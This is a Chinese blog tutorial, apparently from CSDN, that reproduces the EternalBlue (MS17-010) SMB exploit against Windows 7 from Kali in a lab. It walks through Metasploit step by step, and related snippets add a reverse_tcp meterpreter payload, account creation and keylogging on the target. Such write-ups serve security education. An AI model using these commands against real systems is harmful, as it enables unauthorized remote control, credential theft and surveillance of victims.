永恒之蓝漏洞利用复现

已于 2024-10-25 21:42:31 修改
阅读量608 收藏
点赞数 18
文章标签: 网络安全 linux windows
于 2024-10-25 21:37:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/star3119391396/article/details/143243968
版权

准备阶段:
1.系统:kali,win7
2.使用工具:metasploit,msfconsole
3.知道攻击机(一般是kali)和目标机(win7)的ip地址

操作:
1.打开kali终端,切换到root权限
2.初始化metasploit,输入 msfdb init
3.启动msfconsole

msf使用法则:
使用模块 -> 配置模块必选项 -> 运行模块

metasploit攻击永恒之蓝全流程:
开始之前一般会先ping一下目标机,如果连不上请把目标机的防火墙关了。
1.查找永恒之蓝模块 search ms17_010
2.使用模块 use exploit/windows/smb/ms17_010_eternalblue
3.查看必选项 show options
4.设置必选项 set RHOSTS 目标机ip
set LHOSTS 攻击机ip
5.run

完成攻击后,会进入meterpreter命令行,输入shell,就进入了目标机的命令界面,可以想干嘛就干嘛了。

微软EternalBlue永恒之蓝漏洞攻击测试
我的学习笔记
02-28 5020
声明:仅供学习交流使用,个人实验笔记。排版比较懒。微软MS17-010理论:SMBv1 漏洞攻击,445端口。环境准备:攻击资源:攻击工具包 点我攻击者系统:Windows 7 Ultimate (x64) 点我受害者系统:Windows 7 Ultimate (x64) 点我,winXP,win2008,win2003均可。 点我辅助攻击用系统:kal...
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验
2401_84297796的博客
05-03 1650
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
永恒之蓝漏洞攻击
qq_54250695的博客
05-16 2206
使用方法 进入框架:msfconsole 使用sear kali ip: 采用nat的桥接模式: 保证kali和win7能够通信 nmap -sS -A win7ip (查看攻击对象win7所开放的所有端口) msfconsole (启动渗透框架) search ms17_010 (查看ms17_010模块工具) 选择攻击模块: use exploit/windows/smb/ms17_010_e...
永恒之蓝漏洞
最新发布
2401_85624649的博客
04-07 145
输入shell 进行windows命令界面 输出chcp 65001 修改编码 解决乱码问题。输入use auxiliary/scanner/smb/smb_ms17_010加载扫描模块。输入set rhosts 10.225..91.16 配置目标主机。在目标电脑中创建 ckw 用户 密码为:admin.123456。输入search ms17-010 搜索利用漏洞的 脚本工具。然后运行扫描发现有ms17-010漏洞。输入msfconsole进入msf。使用永恒之蓝攻击模块:use。
永恒之蓝 ——漏洞攻击
m0_56679835的博客
03-31 470
永恒之蓝 ——漏洞攻击 永恒之蓝——漏洞攻击(命令行操作) 1.查看kali的IP地址:ifconfig 2.查看Windows的IP地址:ipconfig 3.用kali ping Windows 的主机 4.输入linux命令 su root 5.输入msfconsole 6.使用攻击武器:use auxiliary/scanner/smb/smb/_version 7.选择IP进行攻击 set rhosts 192.168.140.128 8.运行 run 9.定义线程 :set threads 20
记录一次永恒之蓝(ms17-010)漏洞攻击 【后附msf常用命令】
向安全进发的博客
03-28 5027
永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。#执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的有。
MS17-010(Eternal blue永恒之蓝漏洞利用
weightqwe的博客
09-11 728
4. set rhost 《ip》 这个是输入你要用来检查目标的IP 比如的目标ip是 192.168.119.130 那么正确格式就是 set rhost 192.168.119.130。利用后果:攻击者可以完全控制受影响的系统,执行任意代码,安装软件,查看、更改或删除数据,甚至在网络中传播恶意软件(例如 WannaCry 勒索病毒就是利用了这个漏洞)。漏洞描述:EternalBlue 利用 SMBv1 的实现中的一个漏洞,允许攻击者在无身份验证的情况下远程执行代码。
Windows 2008永恒之蓝漏洞利用与后渗透测试详解
09-23
具体涉及nmap命令实施的端口和服务枚举以及利用永恒之蓝漏洞(MS17-010 EternalBlue)取得目标主机管理访问,最终展示了在已攻破的目标环境中进一步行动的步骤和技术手段。适用于希望了解Windows操作系统特定远程...
Kali--永恒之蓝漏洞复现
f1245179815的博客
10-24 1135
该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于发现被漏洞影响的 Windows主机,以及执行命令,可以通过提供的选项进行数据包分析,或可选通道溢出使用,以获得远程命令执行的权限。该模块用于利用MS17-010漏洞实现远程执行代码,可以覆盖掉目标计算机的内存地址,从而实现攻击者的恶意代码在被攻击计算机上的执行。当目标机开机,程序后台运行,且监听端口为7777,这个端口可以自己设置。
2024年最新[永恒之蓝]实战-漏洞复现_永恒之蓝漏洞复现实验(1)
2401_84297796的博客
05-03 1056
1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
永恒之蓝漏洞复现
qq_61024461的博客
07-17 328
永恒之蓝漏洞复现
永恒之蓝-永恒之蓝漏洞linux
wrypot的博客
04-02 605
读取到的键盘内容被保存在/root/.msf4/loot/20230402110004_default_192.168.132.129_host.windows.key_145354.txt。然后use auxiliary/scanner/smb/smb_ms17_010 使用载荷,这个不是攻击载荷,这个是查看的有没有漏洞的,然后show options。然后run post/windows/capture/keylog_recorderj就可以监听键盘了。搜索载荷,永恒之蓝的载荷是ms17_010。
永恒之蓝漏洞利用攻击以及修复方法
Gjqhs的博客
12-12 7179
MS17-010(Eternal blue永恒之蓝漏洞利用+修复方法 前言 0x01 准备工作 0x02 漏洞利用 0x03 修复方案 总结 前言 提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。 该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了.
蠕虫病毒利用"永恒之蓝"漏洞传播 单位局域网受威胁最大
weixin_33962923的博客
08-09 824
一、 概述 日前,火绒安全团队通过"火绒威胁情报系统"发现蠕虫病毒"Worm/Sharp"正在全网传播,其中在政府、企业、学校、医院等单位的局域网具有非常强的传播能力。该病毒通过"永恒之蓝"漏洞、多个电脑常用端口传播,入侵电脑后,会横向攻击局域网内所有电脑,同时还会在用户电脑中留下后门病毒,用以执行更多恶意攻击,如勒索病毒、挖矿病毒。 火绒工程师通过技术分析发现,该蠕虫病毒会通过远程服务器和自身爬...
网络安全必学渗透测试流程
qq_44005305的博客
02-12 710
无论你是去B站或者是油管上面都有很多网络安全的相关视频可以学习,当然如果你还不知道选择那套学习,我这里也整理了一套和上述成长路线图挂钩的视频教程,完整版的视频已经上传至优快云官方,朋友们如果需要可以点击这个链接免费领取。3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。
Kali使用msf利用漏洞永恒之蓝渗透测win7
2301_76361674的博客
05-01 965
声明!!!!声明!!!!只用于靶机测试!!!
EternalBlue【永恒之蓝漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
m0_73734159的博客
12-26 8437
2017年永恒之蓝漏洞,编号为ms17漏洞。现在只有一些低版本的电脑没有打ms17_010的补丁,windows7 以上版本几乎都没有这个漏洞了。虽然如此,此漏洞非常经典,现如今仍有很大的学习漏洞原理以及深入研究防御策略都有很大的借鉴和学习研究的意义。让大家可以对网络安全更加重视,网络安全刻不容缓,让我们为国家网络安全的建设共同努力!
永恒之蓝漏洞复现ubuntu
12-06
永恒之蓝(EternalBlue)是一个严重的安全漏洞,最初由美国国家安全局(NSA)发现,后来被黑客组织Shadow Brokers泄露。永恒之蓝利用Windows SMB服务中的一个漏洞,允许攻击者远程执行代码。为了复现永恒之蓝漏洞在Ubuntu系统上的影响,通常需要设置一个实验环境。以下是复现永恒之蓝漏洞的基本步骤: ### 环境准备 1. **安装虚拟机**:使用VirtualBox或VMware安装两台虚拟机,一台运行Ubuntu,另一台运行Windows(建议使用Windows 7或Windows Server 2008,因为这些版本更容易受到永恒之蓝攻击)。 2. **网络配置**:确保两台虚拟机在同一局域网内,可以互相通信。 ### 步骤 1. **安装必要的软件**: - 在Ubuntu上安装Metasploit框架: ```bash sudo apt update sudo apt install metasploit-framework ``` - 在Windows虚拟机上禁用防火墙和防病毒软件,以确保攻击能够成功。 2. **启动Metasploit**: ```bash msfconsole ``` 3. **搜索永恒之蓝模块**: ```bash search eternalblue ``` 4. **使用永恒之蓝模块**: ```bash use exploit/windows/smb/ms17_010_eternalblue ``` 5. **设置目标IP和本地IP**: ```bash set RHOST <Windows虚拟机IP> set LHOST <Ubuntu虚拟机IP> ``` 6. **选择Payload**: ```bash set PAYLOAD windows/x64/meterpreter/reverse_tcp ``` 7. **执行攻击**: ```bash exploit ``` ### 结果 如果攻击成功,你将获得一个Meterpreter会话,可以远程执行命令和控制目标Windows系统。 ### 注意事项 - **法律和道德**:复现漏洞仅用于学习和研究目的,禁止在未经授权的系统上使用。 - **安全性**:在实际环境中,确保系统已安装最新的安全补丁,以防止此类漏洞利用
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

梦 & 醒

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值